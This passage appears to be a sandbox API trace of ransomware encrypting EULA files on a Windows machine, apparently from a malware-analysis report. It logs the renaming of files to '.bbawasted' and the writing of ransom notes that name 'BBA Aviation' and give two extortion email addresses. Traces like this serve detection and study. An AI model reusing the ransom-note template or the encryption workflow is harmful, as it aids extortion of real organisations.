[0236.089] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xd3187 [0236.089] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd3187) returned 0x1480000 [0236.090] CloseHandle (hObject=0x27c) returned 1 [0236.209] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0236.220] CloseHandle (hObject=0x294) returned 1 [0236.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa7e8 [0236.220] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5f10) returned 1 [0236.221] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x6aa830 | out: pbBuffer=0x6aa830) returned 1 [0236.221] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0236.221] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f10) returned 1 [0236.221] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0236.221] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0236.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0236.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa7e8 | out: hHeap=0x660000) returned 1 [0236.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0236.232] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]FUTOpgZFTxFR2nwM2Ap+QaRL/wdem7nHuTdqqOAa9sflAHV/ctLdvewddh7OQDkA\r\n8142x1VcI2oFmrYVSjamdz5opHMqhnqj0kyLiijAIzNRxC/fVgR9P4e9RNLNzbwl\r\nD2OHuA4iyoXf8vy7OrDiq70zLy8ZYFN1Q9kGDUcs2nCb8iI7QO4Xd+NHrs/81cQf\r\nU+s41MLvw9Zrq31sAVXvxkCHNbYPJeIglVoYeJS560tMi+JI+uTw5/FGA4ZGwx3x\r\nMrrbWNSjx3fIXfQtfy3BgL3BMMpaKsuUnGxcmtZMoeyrRc6vQqSfpm/w3OtsiGG0\r\nFKl0w2L6pJ5fuL+bwidlhizK9InlWuagQ6yraRa5ufuP8YudPHe1CXIqzZcnVn8r\r\nSGzl2YwUg3KvR39eFpi4863IQRSK5JDqSi6X0wxpyyFT6vcibxuQGMurnFQ30gEI\r\nQSkkbn6NoCk83wH1W5XR/Ca3ArhvRGHNaoFSfeio252hjqwN9trZ9tyXGPlisdcF\r\nll3xmuuTRXutkRc2hDhea7RVCp9N8fKpHT/Cr6gtu+gvrw+39KFDenxtf1iai/mf\r\nW+JdWt6LO2UujMJkPH2rt6CjU7YA/ULRNQtKFFmlM2TX6/SM2S29HBjyL2Zvvu/N\r\nUCUvckv1aGtYynW61GhCRMAKaU4ipqaE0/QtcpZtvCR=[end_key]\r\nKEEP IT\r\n") returned 984 [0236.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0236.232] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0236.233] SetEndOfFile (hFile=0x28c) returned 1 [0236.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0236.236] CloseHandle (hObject=0x28c) returned 1 [0236.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0236.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1158 | out: hHeap=0x660000) returned 1 [0236.236] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6bd0) returned 1 [0236.237] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0236.237] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0236.237] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hu-hu.htm") returned 56 [0236.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0236.237] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0236.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0236.237] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6570) returned 1 [0236.238] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0236.238] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0236.238] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hu-hu.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hu-hu.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0236.238] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0236.239] SetEndOfFile (hFile=0x28c) returned 1 [0236.240] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0236.240] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0236.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hu-hu.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hu-hu.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hu-hu.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hu-hu.htm.bbawasted")) returned 1 [0236.241] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hu-hu.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hu-hu.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0236.241] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0236.241] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x14a5a [0236.241] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14a5a) returned 0x5f0000 [0236.241] CloseHandle (hObject=0x294) returned 1 [0236.693] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0236.694] CloseHandle (hObject=0x280) returned 1 [0236.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6a9fc8 [0236.694] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5e88) returned 1 [0236.695] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x1b8, pbBuffer=0x6aa010 | out: pbBuffer=0x6aa010) returned 1 [0236.695] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0236.695] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6b48) returned 1 [0236.696] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0236.696] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0236.707] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0236.707] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9fc8 | out: hHeap=0x660000) returned 1 [0236.707] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0236.707] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]EpL0uOPEyRu6VZPC1D+wvKRnRvyd3BPxnlHMc8wJEq8h33sajPJUP8x3aGw0nEff\r\nRzmWozAOPZhcqCzq5/0ssxYnL7vprdnNyUqH4wgcKRJtbHhQj66EFhIgF/s7zc8x\r\nX2Ots73sozc4UgF1LX52NRYTSsAkFx4H28gwH0jSm0AXf1Azc2DnHvFwWE7eBWzJ\r\nV2rl6tD3HwRkhmpfnQdEhgATOLu5gcDaNflxGEPl1sWVhPEk9Zf3o/Jqi0tLp0SG\r\nMCetFXY7TKsDNXz0D0M1pm8Qf9OseFLA9hZTkKL8OghC4l74v4+8onjdRlygi82U\r\nmmQhUWjCzEYzjvfqxdyYx4xuhxA7F+aNXOnvCicIptXZK/be904wT8uQQFh/Tf6L\r\ncO4zgKzmRAkh3m3N8+kgluTkOKkOu2+867wNtgqwXEXelbbuUkCj49gKhkIzX8u7\r\nJL5EVimxoIiAgpPqwQzHx27prFVUDOutL4S822w8OTWP6vPcE4PPAoA5gx7Zc0Qa\r\nJMkf1AyHNkSNcrTbao2YbtY9R0vIBBRes5A9D2RtSWFEfC9whPBebOb9pLmJb81S\r\nwyaYP8Slxdb10BljLfnAlD+XP5c64QM/95rP0yWDHkHny8fDMaX/jtmtknLIknhv\r\nOwYYlmsr0PUzUQlyvRmEBouh8lM/12mf7Jn1TEHfEQX=[end_key]\r\nKEEP IT\r\n") returned 984 [0236.708] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0236.708] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0236.708] SetEndOfFile (hFile=0x28c) returned 1 [0236.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0236.711] CloseHandle (hObject=0x28c) returned 1 [0236.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0236.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1e58 | out: hHeap=0x660000) returned 1 [0236.711] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a68a0) returned 1 [0236.712] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0236.712] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0236.712] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ko-kr.htm") returned 56 [0236.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0236.712] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0236.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0236.712] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6570) returned 1 [0236.713] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0236.713] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0236.713] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ko-kr.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ko-kr.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0236.714] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0236.715] SetEndOfFile (hFile=0x28c) returned 1 [0236.716] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0236.716] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0236.716] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ko-kr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ko-kr.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ko-kr.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ko-kr.htm.bbawasted")) returned 1 [0236.717] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ko-kr.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ko-kr.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0236.718] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0236.718] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x9ace3 [0236.718] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9ace3) returned 0x14c0000 [0236.718] CloseHandle (hObject=0x280) returned 1 [0237.149] UnmapViewOfFile (lpBaseAddress=0x14c0000) returned 1 [0237.158] CloseHandle (hObject=0x27c) returned 1 [0237.158] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa7e8 [0237.158] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6bd0) returned 1 [0237.159] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x6aa830 | out: pbBuffer=0x6aa830) returned 1 [0237.159] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0237.159] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6680) returned 1 [0237.160] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0237.160] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0237.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0237.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa7e8 | out: hHeap=0x660000) returned 1 [0237.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.281] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]X/i758V7mbe9mGS/AR7qbKG9JHpnn+pG4R7UjTeEy+QQjAabJA5PlC/QPSTV8riN\r\np4ndRs0gwZAoUbn1bfz6pIkUkiWzUsL78o/rRdgqzpISAf9M3I9uO7+EC+uad4ci\r\na8K37YKR3wkj2gSO07hHgeD7zVH8v27V/HZC9FcOi/D3qdipjzaCJmVYNjEQbUKZ\r\nV/RcklqHqCFNgO6Lid+E37GyRtyOmQ5fhQCEPeyEdAmRCktwNhbx/O1EY/SZJF6p\r\nrYxW48q0diu6stGfaYszG8u5zs6Mci0R2rz5Zk9+NuQ3XDI/67aYrTsec8ZPQCfJ\r\n+9FuFPMUqETHA6Vx7iCOEJDgbRHbObmffGxNR5LZSeYmJGrakI8RczRDuL6o6NV5\r\nkRYBIGXAazI8cr62cJkbBlI2G5nORzHMt9+fK9iFhcJhKcNHsC8OyEIJXspJ39BC\r\nEnT4sGyjCNB1deEp+TadQRy0qdSdYFwbtS21nXczl8qebEjr8guKUmpLDUmqm1pn\r\neOtwTwIGw7isDa7J6DavpbvM+RXE5HbhFvzv02UWE/uV7fap18j5hRk2MhdKtBGp\r\nCWDraK9rjIKfNF5vV3hwLoaLanxAHiPf9a1jk+jNqBeTOGQCgXsA/7aSS2kFjko5\r\nweb6uHWowYbTTv4iw32KAADAQ1lV/DqsDC6wa3wIPLo=[end_key]\r\nKEEP IT\r\n") returned 984 [0237.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0237.281] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0237.281] SetEndOfFile (hFile=0x28c) returned 1 [0237.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.284] CloseHandle (hObject=0x28c) returned 1 [0237.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0237.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c12f8 | out: hHeap=0x660000) returned 1 [0237.285] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a61b8) returned 1 [0237.285] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0237.285] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0237.286] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nb-no.htm") returned 56 [0237.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0237.286] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0237.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.286] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a64e8) returned 1 [0237.286] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0237.286] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0237.286] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nb-no.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nb-no.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0237.287] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0237.289] SetEndOfFile (hFile=0x28c) returned 1 [0237.289] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.289] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0237.289] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nb-no.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nb-no.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nb-no.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nb-no.htm.bbawasted")) returned 1 [0237.290] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nb-no.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nb-no.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0237.290] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0237.291] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x10674 [0237.291] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10674) returned 0x5f0000 [0237.291] CloseHandle (hObject=0x27c) returned 1 [0237.295] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0237.297] CloseHandle (hObject=0x280) returned 1 [0237.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa1d0 [0237.297] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6020) returned 1 [0237.297] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x1b8, pbBuffer=0x6aa218 | out: pbBuffer=0x6aa218) returned 1 [0237.297] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0237.298] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6570) returned 1 [0237.298] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0237.298] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0237.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0237.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa1d0 | out: hHeap=0x660000) returned 1 [0237.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.309] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 